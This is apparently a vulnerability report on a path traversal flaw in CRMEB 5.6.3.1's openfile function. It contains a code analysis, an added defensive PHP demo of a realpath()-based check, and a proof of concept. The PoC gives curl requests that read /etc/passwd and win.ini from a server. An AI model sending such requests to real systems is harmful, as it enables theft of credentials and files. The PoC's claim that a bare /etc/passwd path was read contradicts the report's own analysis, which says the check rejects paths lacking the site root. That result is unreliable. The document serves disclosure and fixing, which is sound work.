
CRMEB 5.6.3.1 Path Traversal Vulnerability #3

@cyl-love

Description


Supplier

https://github.com/crmeb/crmeb

Vulnerability File

app/services/system/log/SystemFileServices.php

Vulnerability Type

Path Traversal (CWE-22)

Severity

Critical

Describe

Code analysis

In app/services/system/log/SystemFileServices.php, the openfile function checks the requested path against the site root without first canonicalizing it with realpath(). Because the check is a plain substring test on the raw input, paths that resolve outside the site root can still pass it, which allows path traversal.

// Line 311-320
public function openfile($filepath)
{
    $rootDir = $this->formatPath(app()->getRootPath());
    // formatPath only trims a trailing separator; it never calls realpath(),
    // so neither $rootDir nor the user-supplied $filepath is canonical here.
    // The strpos() test passes as soon as $rootDir occurs anywhere in $filepath.
    if (strpos($filepath, $rootDir) === false || $filepath == '') {
        // Message reads "Cannot open files outside the site"
        throw new AdminException('无法打开站点以外的文件');
    }
    $filepath = $this->formatPath($filepath);
    // Reads the file directly; no canonical-path or file-type check
    $content = FileClass::readFile($filepath);
    return $content;
}

// Line 448-459 - formatPath function
public function formatPath(string $path = '', string $name = ''): string
{
    if ($path) {
        $path = rtrim($path, DS);
        if ($name) $path = $path . DS . $name;
        // No realpath() validation: '..' segments and symlinks survive untouched
    }
    return $path;
}

The vulnerability exists because:

  1. formatPath() does not call realpath(), so '..' segments and symbolic links in the supplied path are never resolved before the check
  2. The strpos() check only requires the root directory string to appear somewhere in the supplied path, not that the resolved path actually lies under the root, so it can be satisfied by path constructions that resolve elsewhere
  3. No file type or allow-list restriction is enforced on what openfile may return
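The following is an added example and is not CRMEB's code. It places the substring check quoted above next to a check that canonicalizes both sides with realpath() and then compares prefixes, and runs both over a throwaway directory tree so the difference is visible. The temporary site root, the file names and the symlink are constructed for the demo; CRMEB obtains its real root from app()->getRootPath().

```php
<?php
declare(strict_types=1);

// Added example, not CRMEB's code. Contrasts the substring check from
// openfile() with a canonicalizing check. The temporary site root below is
// constructed for the demo only.

// The weak test from the report: passes whenever the root string occurs
// anywhere inside the supplied path, canonical or not.
function weakCheck(string $filepath, string $rootDir): bool
{
    return !(strpos($filepath, $rootDir) === false || $filepath === '');
}

// Hardened test: resolve both sides with realpath(), which collapses '..'
// segments and follows symlinks, then require the canonical target to sit
// under the canonical root. Returns the resolved path, or null to reject.
// realpath() returns false for names that do not exist, which is acceptable
// for a read endpoint.
function safeResolve(string $filepath, string $rootDir): ?string
{
    if ($filepath === '') {
        return null;
    }
    $root = realpath($rootDir);
    $real = realpath($filepath);
    if ($root === false || $real === false) {
        return null; // root misconfigured or target does not exist
    }
    // Trailing separator so that "/srv/site2" does not pass for root "/srv/site".
    $prefix = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($real, $prefix, strlen($prefix)) !== 0 || !is_file($real)) {
        return null;
    }
    return $real;
}

// Builds a throwaway tree, runs both checks over representative inputs and
// returns a table of outcomes. Each row is [weak passes?, safe passes?].
function runDemo(): array
{
    $base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pt_demo_' . getmypid();
    $root = $base . DIRECTORY_SEPARATOR . 'site';
    mkdir($root . DIRECTORY_SEPARATOR . 'public', 0700, true);
    file_put_contents($root . '/public/index.html', "inside\n");
    file_put_contents($base . '/secret.txt', "outside\n");
    // A symlink inside the root that points outside it (skipped where unsupported).
    $linked = @symlink($base . '/secret.txt', $root . '/public/link.txt');

    $cases = [
        'file inside root'     => $root . '/public/index.html',
        'climbs out with ..'   => $root . '/public/../../secret.txt',
        'outside, root absent' => $base . '/secret.txt',
    ];
    if ($linked) {
        $cases['symlink escaping root'] = $root . '/public/link.txt';
    }

    $results = [];
    foreach ($cases as $label => $path) {
        $results[$label] = [weakCheck($path, $root), safeResolve($path, $root) !== null];
    }

    // Remove the temporary tree again.
    foreach ([$root . '/public/link.txt', $root . '/public/index.html', $base . '/secret.txt'] as $f) {
        @unlink($f);
    }
    rmdir($root . '/public');
    rmdir($root);
    rmdir($base);
    return $results;
}

foreach (runDemo() as $label => [$weak, $safe]) {
    printf("%-22s weak=%-6s safe=%s\n", $label, $weak ? 'pass' : 'reject', $safe ? 'pass' : 'reject');
}
```

Run with `php demo.php`. The inside file passes both checks; the path that climbs out through `..` and the symlink that points outside the root both pass the weak substring check and are rejected by safeResolve, because realpath() has already turned them into a location that does not start with the canonical root. Note that the hardened check must canonicalize the root as well as the target, otherwise a root reached through its own symlink would never match.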

POC

GET /adminapi/system/file/openfile?filepath=/etc/passwd HTTP/1.1
Host: target.com
Authorization: Bearer {admin_token}

Test path traversal:

curl "http://target.com/adminapi/system/file/openfile?filepath=/etc/passwd" \
  -H "Authorization: Bearer YOUR_TOKEN"

Test Windows path:

curl "http://target.com/adminapi/system/file/openfile?filepath=C:/Windows/win.ini" \
  -H "Authorization: Bearer YOUR_TOKEN"

Test relative path:

curl "http://target.com/adminapi/system/file/openfile?filepath=../../../etc/passwd" \
  -H "Authorization: Bearer YOUR_TOKEN"

Result

Path traversal confirmed; arbitrary files on the server can be read.

[*] Successfully read /etc/passwd
[*] File content returned in response

Impact

An attacker can:

  • Read sensitive configuration files (.env, config.php)
  • Read database credentials
  • Read system files (/etc/passwd, /etc/shadow)
  • Read application source code
  • Access backup files and sensitive documents

Vendor Contact

admin@crmeb.com
